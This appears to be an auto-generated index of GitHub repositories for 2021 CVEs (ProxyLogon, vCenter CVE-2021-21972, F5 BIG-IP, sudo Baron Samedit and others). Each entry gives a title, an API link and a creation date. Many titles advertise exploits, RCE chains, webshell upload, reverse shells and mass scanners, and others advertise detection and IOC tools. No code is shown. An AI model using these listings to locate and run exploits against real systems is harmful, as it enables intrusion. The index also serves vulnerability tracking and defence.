**HostHeaderInjection-Askey** : [bokanrb/CVE-2021-27404](https://api.github.com/repos/bokanrb/CVE-2021-27404) create time: 2021-02-18T17:16:39Z

**None** : [SQSamir/CVE-2021-27328](https://api.github.com/repos/SQSamir/CVE-2021-27328) create time: 2021-02-19T07:15:48Z

**CVE-2021-21110 : Tiki Wiki CMS GroupWare Serverside Template Injection Remote Code Execution Exploit** : [Gh0st0ne/CVE-2021-21110](https://api.github.com/repos/Gh0st0ne/CVE-2021-21110) create time: 2021-02-20T02:19:40Z

**2021 CVE/other Vulnerabilities** : [DesM00nd/2021](https://api.github.com/repos/DesM00nd/2021) create time: 2021-02-20T10:02:02Z

**CVE-2021-3129-Laravel Debug mode 远程代码执行漏洞** : [simonlee-hello/CVE-2021-3129](https://api.github.com/repos/simonlee-hello/CVE-2021-3129) create time: 2021-02-21T06:27:18Z

**None** : [oneoy/CVE-2021-3156](https://api.github.com/repos/oneoy/CVE-2021-3156) create time: 2021-02-23T03:14:36Z

**CVE-2021-3327** : [IthacaLabs/CVE-2021-3327](https://api.github.com/repos/IthacaLabs/CVE-2021-3327) create time: 2021-02-24T10:57:22Z

**ISIDA RETRIEVER v5.2" Reflected XSS** : [Security-AVS/CVE-2021-26903](https://api.github.com/repos/Security-AVS/CVE-2021-26903) create time: 2021-02-24T12:36:01Z

**LMA ISIDA Retriever 5.2 allows SQL Injection** : [Security-AVS/-CVE-2021-26904](https://api.github.com/repos/Security-AVS/-CVE-2021-26904) create time: 2021-02-24T12:42:52Z

**None** : [yaunsky/CVE-2021-21972](https://api.github.com/repos/yaunsky/CVE-2021-21972) create time: 2021-02-24T13:19:41Z

**CVE-2021-21972 vCenter-6.5-7.0 RCE POC** : [Udyz/CVE-2021-21972](https://api.github.com/repos/Udyz/CVE-2021-21972) create time: 2021-02-25T05:25:46Z

**None** : [alt3kx/CVE-2021-21972](https://api.github.com/repos/alt3kx/CVE-2021-21972) create time: 2021-02-25T05:10:06Z

**VMware vCenter 未授权RCE(CVE-2021-21972)** : [conjojo/VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972](https://api.github.com/repos/conjojo/VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972) create time: 2021-02-25T07:17:21Z

**VMware vCenter Server远程代码执行漏洞 (CVE-2021-21972)批量检测脚本** : [B1anda0/CVE-2021-21972](https://api.github.com/repos/B1anda0/CVE-2021-21972) create time: 2021-02-25T10:16:20Z

**CVE-2021-21972** : [renini/CVE-2021-21972](https://api.github.com/repos/renini/CVE-2021-21972) create time: 2021-02-25T13:04:37Z

**Proof of Concept Exploit for vCenter CVE-2021-21972** : [horizon3ai/CVE-2021-21972](https://api.github.com/repos/horizon3ai/CVE-2021-21972) create time: 2021-02-24T16:31:34Z

**NSE scripts to detect CVE-2020-1350 SIGRED and CVE-2020-0796 SMBGHOST, CVE-2021-21972** : [psc4re/NSE-scripts](https://api.github.com/repos/psc4re/NSE-scripts) create time: 2020-03-11T17:51:29Z

**None** : [L-pin/CVE-2021-21972](https://api.github.com/repos/L-pin/CVE-2021-21972) create time: 2021-02-25T09:28:17Z

**None** : [ZeusBox/CVE-2021-21017](https://api.github.com/repos/ZeusBox/CVE-2021-21017) create time: 2021-02-26T14:18:13Z

**None** : [JMousqueton/Detect-CVE-2021-21972](https://api.github.com/repos/JMousqueton/Detect-CVE-2021-21972) create time: 2021-02-27T09:53:57Z

**VMware vCenter CVE-2021-21972 Tools** : [robwillisinfo/VMware_vCenter_CVE-2021-21972](https://api.github.com/repos/robwillisinfo/VMware_vCenter_CVE-2021-21972) create time: 2021-02-27T10:27:04Z

**None** : [DougCarroll/CVE_2021_21972](https://api.github.com/repos/DougCarroll/CVE_2021_21972) create time: 2021-02-27T00:55:13Z

**None** : [Udyz/CVE-2021-26119](https://api.github.com/repos/Udyz/CVE-2021-26119) create time: 2021-02-28T14:05:23Z

**CVE-2021-3378 | FortiLogger - Unauthenticated Arbitrary File Upload (Metasploit)** : [erberkan/fortilogger_arbitrary_fileupload](https://api.github.com/repos/erberkan/fortilogger_arbitrary_fileupload) create time: 2021-01-30T23:47:14Z

**None** : [QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC](https://api.github.com/repos/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC) create time: 2021-02-24T09:56:21Z

**CVE-2021-21972** : [milo2012/CVE-2021-21972](https://api.github.com/repos/milo2012/CVE-2021-21972) create time: 2021-02-25T05:16:38Z

**漏洞利用,Vmware vCenter 6.5-7.0 RCE(CVE-2021-21972),上传冰蝎3,getshell** : [gsheller/vcenter_rce](https://api.github.com/repos/gsheller/vcenter_rce) create time: 2021-03-01T14:14:01Z

**CVE 2021-21315 PoC** : [ForbiddenProgrammer/CVE-2021-21315-PoC](https://api.github.com/repos/ForbiddenProgrammer/CVE-2021-21315-PoC) create time: 2021-03-01T18:52:41Z

**None** : [synacktiv/CVE-2021-27246_Pwn2Own2020](https://api.github.com/repos/synacktiv/CVE-2021-27246_Pwn2Own2020) create time: 2021-03-01T16:45:42Z

**com_media allowed paths that are not intended for image uploads to RCE** : [HoangKien1020/CVE-2021-23132](https://api.github.com/repos/HoangKien1020/CVE-2021-23132) create time: 2021-03-03T02:13:57Z

**Nmap script to check vulnerability CVE-2021-21972** : [GuayoyoCyber/CVE-2021-21972](https://api.github.com/repos/GuayoyoCyber/CVE-2021-21972) create time: 2021-02-26T21:30:50Z

**IOCs found exploiting CVE-2021-26855 thanks to info from Volexity and MS and Huntresslabs.** : [stressboi/hafnium-exchange-splunk-csvs](https://api.github.com/repos/stressboi/hafnium-exchange-splunk-csvs) create time: 2021-03-03T00:11:09Z

**Exploit code for CVE-2021-21042** : [NattiSamson/CVE-2021-21042](https://api.github.com/repos/NattiSamson/CVE-2021-21042) create time: 2021-03-04T07:01:08Z

**CVE-2021-21972 related vulnerability code** : [ByZain/CVE-2021-21972](https://api.github.com/repos/ByZain/CVE-2021-21972) create time: 2021-03-04T07:14:10Z

**None** : [cherrera0001/CVE-2021-21315v2](https://api.github.com/repos/cherrera0001/CVE-2021-21315v2) create time: 2021-03-04T11:47:18Z

**CVE-2021-1732 Exploit** : [KaLendsi/CVE-2021-1732-Exploit](https://api.github.com/repos/KaLendsi/CVE-2021-1732-Exploit) create time: 2021-03-05T02:11:10Z

**CVE-2021-21978 exp** : [GreyOrder/CVE-2021-21978](https://api.github.com/repos/GreyOrder/CVE-2021-21978) create time: 2021-03-05T03:58:33Z

**CVE-2021-21978 EXP** : [me1ons/CVE-2021-21978](https://api.github.com/repos/me1ons/CVE-2021-21978) create time: 2021-03-05T04:33:19Z

**带回显版本的漏洞利用脚本** : [skytina/CVE-2021-21978](https://api.github.com/repos/skytina/CVE-2021-21978) create time: 2021-03-05T08:15:27Z

**CTF for HDE 64 students at See Security College. Exploit a JWT (web part) & CVE-2021-3156 (LPE part).** : [TheSerialiZator/CTF-2021](https://api.github.com/repos/TheSerialiZator/CTF-2021) create time: 2021-02-03T08:36:01Z

**A PowerShell script to identify indicators of exploitation of CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-26865** : [soteria-security/HAFNIUM-IOC](https://api.github.com/repos/soteria-security/HAFNIUM-IOC) create time: 2021-03-03T17:36:18Z

**Microsoft Exchange Server SSRF漏洞(CVE-2021-26855)** : [conjojo/Microsoft_Exchange_Server_SSRF_CVE-2021-26855](https://api.github.com/repos/conjojo/Microsoft_Exchange_Server_SSRF_CVE-2021-26855) create time: 2021-03-06T09:15:55Z

**Chaining CVE-2021-25281 and CVE-2021-25282 to exploit a SaltStack** : [Immersive-Labs-Sec/CVE-2021-25281](https://api.github.com/repos/Immersive-Labs-Sec/CVE-2021-25281) create time: 2021-02-26T12:08:25Z

**CVE-2021-26855 SSRF Exchange Server** : [Th3eCrow/CVE-2021-26855-SSRF-Exchange](https://api.github.com/repos/Th3eCrow/CVE-2021-26855-SSRF-Exchange) create time: 2021-03-07T00:55:16Z

**Exploit for CVE-2021-3129** : [nth347/CVE-2021-3129_exploit](https://api.github.com/repos/nth347/CVE-2021-3129_exploit) create time: 2021-01-27T10:16:35Z

**CVE-2021-21972 Unauthorized RCE in VMware vCenter metasploit exploit script** : [TaroballzChen/CVE-2021-21972](https://api.github.com/repos/TaroballzChen/CVE-2021-21972) create time: 2021-03-07T16:30:36Z

**CVE-2021-26855 exp** : [charlottelatest/CVE-2021-26855](https://api.github.com/repos/charlottelatest/CVE-2021-26855) create time: 2021-03-08T08:39:05Z

**CVE-­2021­-1732 Microsoft Windows 10 本地提权漏 研究及Poc/Exploit开发** : [k-k-k-k-k/CVE-2021-1732](https://api.github.com/repos/k-k-k-k-k/CVE-2021-1732) create time: 2021-03-08T05:07:15Z

**None** : [oneoy/CVE-2021-1732-Exploit](https://api.github.com/repos/oneoy/CVE-2021-1732-Exploit) create time: 2021-03-09T02:13:43Z

**This script test the CVE-2021-26855 vulnerability on Exchange Server.** : [mauricelambert/ExchangeWeaknessTest](https://api.github.com/repos/mauricelambert/ExchangeWeaknessTest) create time: 2021-03-09T09:40:29Z

**Microsoft Exchange Server Remote Code Execution Vulnerability (ProxyLogon)** : [PwCNO-CTO/CVE-2021-26855](https://api.github.com/repos/PwCNO-CTO/CVE-2021-26855) create time: 2021-03-09T11:57:26Z

**Quick One Line Powershell scripts to detect for webshells, possible zips, and logs.** : [adamrpostjr/cve-2021-27065](https://api.github.com/repos/adamrpostjr/cve-2021-27065) create time: 2021-03-06T04:47:35Z

**None** : [h4x0r-dz/CVE-2021-26855](https://api.github.com/repos/h4x0r-dz/CVE-2021-26855) create time: 2021-03-09T16:54:39Z

**PoC exploit code for CVE-2021-26855** : [srvaccount/CVE-2021-26855-PoC](https://api.github.com/repos/srvaccount/CVE-2021-26855-PoC) create time: 2021-03-09T14:27:06Z

**PoC for CVE-2021-26855 -Just a checker-** : [0xAbdullah/CVE-2021-26855](https://api.github.com/repos/0xAbdullah/CVE-2021-26855) create time: 2021-03-06T23:12:22Z

**CVE-2021-21972 Exploit** : [NS-Sp4ce/CVE-2021-21972](https://api.github.com/repos/NS-Sp4ce/CVE-2021-21972) create time: 2021-02-24T11:14:58Z

**This script helps to identify CVE-2021-26855 ssrf Poc** : [pussycat0x/CVE-2021-26855-SSRF](https://api.github.com/repos/pussycat0x/CVE-2021-26855-SSRF) create time: 2021-03-06T19:03:00Z

**None** : [AlkenePan/CVE-2021-21300](https://api.github.com/repos/AlkenePan/CVE-2021-21300) create time: 2021-03-10T08:29:49Z

**None** : [achabahe/CVE-2021-26855](https://api.github.com/repos/achabahe/CVE-2021-26855) create time: 2021-03-10T12:23:43Z

**None** : [erranfenech/CVE-2021-21300](https://api.github.com/repos/erranfenech/CVE-2021-21300) create time: 2021-03-10T17:15:49Z

**None** : [Maskhe/CVE-2021-21300](https://api.github.com/repos/Maskhe/CVE-2021-21300) create time: 2021-03-11T02:57:11Z

**POC of CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-26865, ProxyLogon poc** : [Yt1g3r/CVE-2021-26855_SSRF](https://api.github.com/repos/Yt1g3r/CVE-2021-26855_SSRF) create time: 2021-03-08T07:28:21Z

**remote code exec for git** : [1uanWu/CVE-2021-21300](https://api.github.com/repos/1uanWu/CVE-2021-21300) create time: 2021-03-11T03:59:49Z

**[CVE-2021-3019] LanProxy Directory Traversal** : [murataydemir/CVE-2021-3019](https://api.github.com/repos/murataydemir/CVE-2021-3019) create time: 2021-03-11T07:40:44Z

**None** : [d3sh1n/cve-2021-21972](https://api.github.com/repos/d3sh1n/cve-2021-21972) create time: 2021-03-03T03:01:46Z

**None** : [Kirill89/CVE-2021-21300](https://api.github.com/repos/Kirill89/CVE-2021-21300) create time: 2021-03-11T09:56:03Z

**PoC** : [songjianyang/CVE-2021-26882](https://api.github.com/repos/songjianyang/CVE-2021-26882) create time: 2021-03-11T13:41:42Z

**proxylogon exploit - CVE-2021-26857** : [sirpedrotavares/Proxylogon-exploit](https://api.github.com/repos/sirpedrotavares/Proxylogon-exploit) create time: 2021-03-11T17:32:32Z

**PoC of proxylogon chain SSRF(CVE-2021-26855) to write file by testanull, censored by github** : [hackerschoice/CVE-2021-26855](https://api.github.com/repos/hackerschoice/CVE-2021-26855) create time: 2021-03-11T20:51:48Z

**None** : [CppXL/CVE-2021-21300](https://api.github.com/repos/CppXL/CVE-2021-21300) create time: 2021-03-12T06:45:04Z

**Scanner and PoC for CVE-2021-26855 ** : [KotSec/CVE-2021-26855-Scanner](https://api.github.com/repos/KotSec/CVE-2021-26855-Scanner) create time: 2021-03-12T12:47:41Z

**None** : [alt3kx/CVE-2021-26855_PoC](https://api.github.com/repos/alt3kx/CVE-2021-26855_PoC) create time: 2021-03-10T05:21:19Z

**CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065** : [SCS-Labs/HAFNIUM-Microsoft-Exchange-0day](https://api.github.com/repos/SCS-Labs/HAFNIUM-Microsoft-Exchange-0day) create time: 2021-03-11T21:18:29Z

**SonLogger Vulns (CVE-2021-27963, CVE-2021-27964)** : [erberkan/SonLogger-vulns](https://api.github.com/repos/erberkan/SonLogger-vulns) create time: 2021-02-26T11:44:04Z

**RCE exploit for ProxyLogon vulnerability in Microsoft Exchange** : [mil1200/ProxyLogon-CVE-2021-26855](https://api.github.com/repos/mil1200/ProxyLogon-CVE-2021-26855) create time: 2021-03-14T22:57:21Z

**CVE-2021-26855, also known as Proxylogon, is a server-side request forgery (SSRF) vulnerability in Exchange that allows an attacker to send arbitrary HTTP requests and authenticate as the Exchange server. According to Orange Tsai, the researcher who discovered the vulnerabilities, CVE-2021-26855 allows code execution when chained with CVE-2021-27065 (see below). A successful exploit chain would allow an unauthenticated attacker to "execute arbitrary commands on Microsoft Exchange Server through only an open 443 port." More information and a disclosure timeline are available at https://proxylogon.com.** : [raheel0x01/eeb927d1189ad44742095f58636483984bfbfa355f69f94439e276df306d9568](https://api.github.com/repos/raheel0x01/eeb927d1189ad44742095f58636483984bfbfa355f69f94439e276df306d9568) create time: 2021-03-11T19:35:35Z

**None** : [ETOCheney/cve-2021-21300](https://api.github.com/repos/ETOCheney/cve-2021-21300) create time: 2021-03-15T05:28:47Z

**None** : [0xmahmoudJo0/Check_Emails_For_CVE_2021_26855](https://api.github.com/repos/0xmahmoudJo0/Check_Emails_For_CVE_2021_26855) create time: 2021-03-12T03:48:09Z

**CVE-2021-22986** : [adminwaf/CVE-2021-22986](https://api.github.com/repos/adminwaf/CVE-2021-22986) create time: 2021-03-15T06:45:24Z

**CVE-2021-229861** : [adminwaf/CVE-2021-229861](https://api.github.com/repos/adminwaf/CVE-2021-229861) create time: 2021-03-15T06:48:04Z

**IoC determination for exploitation of CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.** : [sgnls/exchange-0days-202103](https://api.github.com/repos/sgnls/exchange-0days-202103) create time: 2021-03-03T14:50:16Z

**None** : [Mr-xn/CVE-2021-26855-d](https://api.github.com/repos/Mr-xn/CVE-2021-26855-d) create time: 2021-03-15T14:03:16Z

**CVE-2021-26855: PoC (Not a HoneyPoC for once!)** : [ZephrFish/Exch-CVE-2021-26855](https://api.github.com/repos/ZephrFish/Exch-CVE-2021-26855) create time: 2021-03-14T14:23:34Z

**automate me!** : [freakanonymous/CVE-2021-21973-Automateme](https://api.github.com/repos/freakanonymous/CVE-2021-21973-Automateme) create time: 2021-03-16T00:50:15Z

**Detect webshells dropped on Microsoft Exchange servers exploited through "proxylogon" group of vulnerabilites (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065)** : [cert-lv/exchange_webshell_detection](https://api.github.com/repos/cert-lv/exchange_webshell_detection) create time: 2021-03-05T08:22:07Z

**ProxyLogon is the formally generic name for CVE-2021-26855, a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication and impersonating as the admin. We have also chained this bug with another post-auth arbitrary-file-write vulnerability, CVE-2021-27065, to get code execution.** : [RickGeex/ProxyLogon](https://api.github.com/repos/RickGeex/ProxyLogon) create time: 2021-03-16T07:31:25Z

**ProxyLogon Full Exploit Chain PoC (CVE-2021–26855, CVE-2021–26857, CVE-2021–26858, CVE-2021–27065)** : [herwonowr/exprolog](https://api.github.com/repos/herwonowr/exprolog) create time: 2021-03-15T08:36:56Z

**Script used to identify compromise via CVEs 2021-26855, 26857, 26858, and 27065** : [WiredPulse/Invoke-HAFNIUMCheck.ps1](https://api.github.com/repos/WiredPulse/Invoke-HAFNIUMCheck.ps1) create time: 2021-03-04T23:30:22Z

**ProxyLogon(CVE-2021-26855+CVE-2021-27065) Exchange Server RCE(SSRF->GetWebShell)** : [p0wershe11/ProxyLogon](https://api.github.com/repos/p0wershe11/ProxyLogon) create time: 2021-03-17T03:56:54Z

**This is a Poc for BIGIP iControl unauth RCE ** : [dorkerdevil/CVE-2021-22986-Poc](https://api.github.com/repos/dorkerdevil/CVE-2021-22986-Poc) create time: 2021-03-17T05:02:45Z

**CVE-2021-26855 proxyLogon metasploit exploit script** : [TaroballzChen/ProxyLogon-CVE-2021-26855-metasploit](https://api.github.com/repos/TaroballzChen/ProxyLogon-CVE-2021-26855-metasploit) create time: 2021-03-17T03:32:19Z

**An Exploit Utlising CVE-2021-3156 To Harvest All passwords in any Linux system with Sudo < version 1.9.5p2.** : [Chal13W1zz/Sudo-Spunk](https://api.github.com/repos/Chal13W1zz/Sudo-Spunk) create time: 2021-03-17T08:02:07Z

**CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065** : [DCScoder/Exchange_IOC_Hunter](https://api.github.com/repos/DCScoder/Exchange_IOC_Hunter) create time: 2021-03-09T10:36:44Z

**A fast tool to mass scan for a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication and impersonating as the admin (CVE-2021-26855).** : [dwisiswant0/proxylogscan](https://api.github.com/repos/dwisiswant0/proxylogscan) create time: 2021-03-08T11:54:32Z

**None** : [Faisal78123/CVE-2021-21300](https://api.github.com/repos/Faisal78123/CVE-2021-21300) create time: 2021-03-10T16:45:46Z

**None** : [shacojx/Scan-Vuln-CVE-2021-26855](https://api.github.com/repos/shacojx/Scan-Vuln-CVE-2021-26855) create time: 2021-03-16T15:59:17Z

**CVE-2021-3019 lanproxy目录遍历任意文件读取漏洞探测POC** : [FanqXu/CVE-2021-3019](https://api.github.com/repos/FanqXu/CVE-2021-3019) create time: 2021-01-11T04:18:44Z

**A vulnerability scanner that detects CVE-2021-22986 vulnerabilities.** : [Osyanina/westone-CVE-2021-22986-scanner](https://api.github.com/repos/Osyanina/westone-CVE-2021-22986-scanner) create time: 2021-03-20T07:45:38Z

**A vulnerability scanner that detects CVE-2021-21972 vulnerabilities.** : [Osyanina/westone-CVE-2021-21972-scanner](https://api.github.com/repos/Osyanina/westone-CVE-2021-21972-scanner) create time: 2021-02-25T03:19:25Z

**CVE-2021-22986 F5 BIG-IP iControl 命令执行漏洞** : [safesword/F5_RCE](https://api.github.com/repos/safesword/F5_RCE) create time: 2021-03-21T07:40:51Z

**Module pack for #ProxyLogon (part. of my contribute for Metasploit-Framework) [CVE-2021-26855 && CVE-2021-27065]** : [mekhalleh/exchange_proxylogon](https://api.github.com/repos/mekhalleh/exchange_proxylogon) create time: 2021-03-07T12:12:16Z

**lanproxy(CVE-2021-3019)目录遍历** : [Aoyuh/cve-2021-3019](https://api.github.com/repos/Aoyuh/cve-2021-3019) create time: 2021-03-22T06:44:07Z

**Chaining CVE-2021-26855 and CVE-2021-26857 to exploit Microsoft Exchange** : [Immersive-Labs-Sec/ProxyLogon](https://api.github.com/repos/Immersive-Labs-Sec/ProxyLogon) create time: 2021-03-16T10:14:56Z

**🐱‍💻 👍 Google Chrome - File System Access API - vulnerabilities reported by Maciej Pulikowski | Total Bug Bounty Reward: $5.000 | CVE-2021-21123 and 5 more...** : [Puliczek/CVE-2021-21123-PoC-Google-Chrome](https://api.github.com/repos/Puliczek/CVE-2021-21123-PoC-Google-Chrome) create time: 2021-03-22T11:53:57Z

**CVE-2021-22986 Checker Script in Python3** : [ZephrFish/CVE-2021-22986_Check](https://api.github.com/repos/ZephrFish/CVE-2021-22986_Check) create time: 2021-03-23T02:04:39Z

**analytics ProxyLogo Mail exchange RCE** : [hictf/CVE-2021-26855-CVE-2021-27065](https://api.github.com/repos/hictf/CVE-2021-26855-CVE-2021-27065) create time: 2021-03-23T07:37:47Z

**Proof-of-concept exploit for CVE-2021-26855 and CVE-2021-27065. Unauthenticated RCE in Exchange.** : [praetorian-inc/proxylogon-exploit](https://api.github.com/repos/praetorian-inc/proxylogon-exploit) create time: 2021-03-24T01:12:48Z

**CVE-2021-26295 Apache OFBiz rmi反序列化POC** : [rakjong/CVE-2021-26295-Apache-OFBiz](https://api.github.com/repos/rakjong/CVE-2021-26295-Apache-OFBiz) create time: 2021-03-24T08:25:04Z

**Microsoft Exchange Proxylogon Exploit Chain EXP分析** : [r0ckysec/CVE-2021-26855_Exchange](https://api.github.com/repos/r0ckysec/CVE-2021-26855_Exchange) create time: 2021-03-18T00:44:29Z

**F5 BIG-IP/BIG-IQ iControl Rest API SSRF to RCE** : [Udyz/CVE-2021-22986-SSRF2RCE](https://api.github.com/repos/Udyz/CVE-2021-22986-SSRF2RCE) create time: 2021-03-21T04:58:17Z

**CVE-2021-26295 EXP 可成功反弹Shell** : [r0ckysec/CVE-2021-26295](https://api.github.com/repos/r0ckysec/CVE-2021-26295) create time: 2021-03-24T10:08:54Z

**POC for CVE-2021-26871(Maybe)** : [robotMD5/CVE-2021-26871_POC](https://api.github.com/repos/robotMD5/CVE-2021-26871_POC) create time: 2021-03-25T02:38:08Z

**Mybb associate CVE-2021-27890 & CVE-2021-27889 to RCE poc** : [xiaopan233/Mybb-XSS_SQL_RCE-POC](https://api.github.com/repos/xiaopan233/Mybb-XSS_SQL_RCE-POC) create time: 2021-03-25T06:00:31Z

**Verify Vulnerability CVE-2021-26855** : [inpalmer/MSE-Exchange-Alert-Check](https://api.github.com/repos/inpalmer/MSE-Exchange-Alert-Check) create time: 2021-03-25T08:52:49Z

**BuddyPress < 7.2.1 - REST API Privilege Escalation to RCE** : [HoangKien1020/CVE-2021-21389](https://api.github.com/repos/HoangKien1020/CVE-2021-21389) create time: 2021-03-25T08:54:37Z

**Exploit generator for sudo CVE-2021-3156** : [lmol/CVE-2021-3156](https://api.github.com/repos/lmol/CVE-2021-3156) create time: 2021-03-19T14:06:09Z

**F5 BIG-IP远程代码执行;cve-2021-22986,批量检测;命令执行利用** : [yaunsky/CVE-202122986-EXP](https://api.github.com/repos/yaunsky/CVE-202122986-EXP) create time: 2021-03-26T03:32:06Z

**cve-2021-22986 f5 rce 漏洞批量检测 poc** : [S1xHcL/f5_rce_poc](https://api.github.com/repos/S1xHcL/f5_rce_poc) create time: 2021-03-19T18:50:22Z

**None** : [CyberCommands/CVE2021-23132](https://api.github.com/repos/CyberCommands/CVE2021-23132) create time: 2021-03-26T20:36:00Z

**Code By:Tas9er / F5 BIG-IP 远程命令执行漏洞** : [Tas9er/CVE-2021-22986](https://api.github.com/repos/Tas9er/CVE-2021-22986) create time: 2021-03-29T05:56:21Z

**The report and the exploit of CVE-2021-26943, the kernel-to-SMM local privilege escalation vulnerability in ASUS UX360CA BIOS version 303.** : [tandasat/SmmExploit](https://api.github.com/repos/tandasat/SmmExploit) create time: 2020-12-31T16:30:02Z

**SherlockIM ChatBot XSS** : [Security-AVS/CVE-2021-29267](https://api.github.com/repos/Security-AVS/CVE-2021-29267) create time: 2021-03-29T12:50:23Z

**None** : [dotslashed/CVE-2021-22986](https://api.github.com/repos/dotslashed/CVE-2021-22986) create time: 2021-03-29T13:01:08Z

**None** : [waleedassar/CVE-2021-1656](https://api.github.com/repos/waleedassar/CVE-2021-1656) create time: 2021-03-30T05:21:26Z

**CVE-2021-3156漏洞修复Shell** : [Nokialinux/CVE-2021-3156](https://api.github.com/repos/Nokialinux/CVE-2021-3156) create time: 2021-03-30T06:17:44Z

**None** : [ltfafei/CVE-2021-1732_exp](https://api.github.com/repos/ltfafei/CVE-2021-1732_exp) create time: 2021-03-30T07:51:21Z

**CVE-2021-22192 靶场: 未授权用户 RCE 漏洞** : [lyy289065406/CVE-2021-22192](https://api.github.com/repos/lyy289065406/CVE-2021-22192) create time: 2021-03-27T07:09:46Z

**Sudo Baron Samedit Exploit** : [worawit/CVE-2021-3156](https://api.github.com/repos/worawit/CVE-2021-3156) create time: 2021-03-15T17:37:02Z

**POC for CVE-2021-1699** : [waleedassar/CVE-2021-1699](https://api.github.com/repos/waleedassar/CVE-2021-1699) create time: 2021-03-31T08:22:49Z

**CVE-2021-3449 OpenSSL denial-of-service exploit 👨🏻‍💻** : [terorie/cve-2021-3449](https://api.github.com/repos/terorie/cve-2021-3449) create time: 2021-03-26T01:09:25Z

**Due to a reflected XSS vulnerability in PowerSchool (CVE-2021-29386), it is possible to view other people's grades just by having them click on a link while they are logged in to PowerSchool. This demonstrates that with a proof-of-concept.** : [Umarovm/PowerSchool-Grade-Stealer](https://api.github.com/repos/Umarovm/PowerSchool-Grade-Stealer) create time: 2020-11-26T00:43:36Z

**CVE-2021-21975 vRealize Operations Manager SSRF** : [Al1ex/CVE-2021-21975](https://api.github.com/repos/Al1ex/CVE-2021-21975) create time: 2021-03-31T15:40:09Z

**None** : [0xBaz/CVE-2021-29349](https://api.github.com/repos/0xBaz/CVE-2021-29349) create time: 2021-03-31T19:36:29Z

**None** : [hevox/CVE-2021-26828_ScadaBR_RCE](https://api.github.com/repos/hevox/CVE-2021-26828_ScadaBR_RCE) create time: 2021-03-31T02:39:02Z

**POC for CVE-2021-24098** : [waleedassar/CVE-2021-24098](https://api.github.com/repos/waleedassar/CVE-2021-24098) create time: 2021-04-01T07:29:44Z

**None** : [yumusb/CVE-2021-26295](https://api.github.com/repos/yumusb/CVE-2021-26295) create time: 2021-03-23T15:25:01Z

**CVE-2021-26295 Apache OFBiz POC** : [ltfafei/CVE-2021-26295_Apache_OFBiz_POC](https://api.github.com/repos/ltfafei/CVE-2021-26295_Apache_OFBiz_POC) create time: 2021-04-01T11:58:00Z

**Alibaba-Nacos-Unauthorized/ApacheDruid-RCE_CVE-2021-25646/MS-Exchange-SSRF-CVE-2021-26885/Oracle-WebLogic-CVE-2021-2109_RCE/RG-CNVD-2021-14536/RJ-SSL-VPN-UltraVires/Redis-Unauthorized-RCE/TDOA-V11.7-GetOnlineCookie/VMware-vCenter-GetAnyFile/yongyou-GRP-U8-XXE/Oracle-WebLogic-CVE-2020-14883/Oracle-WebLogic-CVE-2020-14882/Apache-Solr-GetAnyFile/F5-BIG-IP-CVE-2021-22986/Sonicwall-SSL-VPN-RCE/GitLab-Graphql-CNVD-2021-14193/D-Link-DCS-CVE-2020-25078/WLAN-AP-WEA453e-RCE** : [Yang0615777/PocList](https://api.github.com/repos/Yang0615777/PocList) create time: 2021-03-11T22:49:17Z

**Nmap script to check vulnerability CVE-2021-21975** : [GuayoyoCyber/CVE-2021-21975](https://api.github.com/repos/GuayoyoCyber/CVE-2021-21975) create time: 2021-04-01T21:59:05Z

**None** : [ltfafei/CVE-2021-21975_VMware_SSRF](https://api.github.com/repos/ltfafei/CVE-2021-21975_VMware_SSRF) create time: 2021-04-02T02:14:12Z

**VMWare vRealize SSRF-CVE-2021-21975** : [Henry4E36/VMWare-vRealize-SSRF](https://api.github.com/repos/Henry4E36/VMWare-vRealize-SSRF) create time: 2021-03-31T12:56:09Z

**[CVE-2021-21975] VMware vRealize Operations Manager API Server Side Request Forgery (SSRF)** : [murataydemir/CVE-2021-21975](https://api.github.com/repos/murataydemir/CVE-2021-21975) create time: 2021-04-02T21:14:06Z

**None** : [password520/CVE-2021-21972](https://api.github.com/repos/password520/CVE-2021-21972) create time: 2021-04-03T12:09:53Z

**CVE-2021-22986 & F5 BIG-IP RCE** : [Al1ex/CVE-2021-22986](https://api.github.com/repos/Al1ex/CVE-2021-22986) create time: 2021-03-22T07:13:50Z

**None** : [CyberCommands/CVE2021-21975](https://api.github.com/repos/CyberCommands/CVE2021-21975) create time: 2021-04-03T16:13:53Z

**None** : [password520/CVE-2021-3156](https://api.github.com/repos/password520/CVE-2021-3156) create time: 2021-04-04T01:15:05Z

**None** : [dock0d1/CVE-2021-3156](https://api.github.com/repos/dock0d1/CVE-2021-3156) create time: 2021-03-09T18:53:14Z

**None** : [shacojx/CVE-2021-26855-exploit-Exchange](https://api.github.com/repos/shacojx/CVE-2021-26855-exploit-Exchange) create time: 2021-03-18T10:45:54Z

**None** : [shacojx/CVE_2021_26855_SSRF](https://api.github.com/repos/shacojx/CVE_2021_26855_SSRF) create time: 2021-03-11T04:33:40Z

**Exploit for Sudo heap overflow (CVE-2021-3156) on Debain 10** : [0xdevil/CVE-2021-3156](https://api.github.com/repos/0xdevil/CVE-2021-3156) create time: 2021-02-08T18:21:58Z

**None** : [AlexSeniorProject/CVE-2021-3156](https://api.github.com/repos/AlexSeniorProject/CVE-2021-3156) create time: 2021-04-05T18:00:43Z

**Froala Persistent XSS** : [Hackdwerg/CVE-2021-30109](https://api.github.com/repos/Hackdwerg/CVE-2021-30109) create time: 2021-04-05T10:14:48Z

**None** : [fengzhouc/CVE-2021-21300](https://api.github.com/repos/fengzhouc/CVE-2021-21300) create time: 2021-04-06T01:44:17Z

**None** : [Sec504/Zyxel-NBG2105-CVE-2021-3297](https://api.github.com/repos/Sec504/Zyxel-NBG2105-CVE-2021-3297) create time: 2021-04-06T02:38:43Z

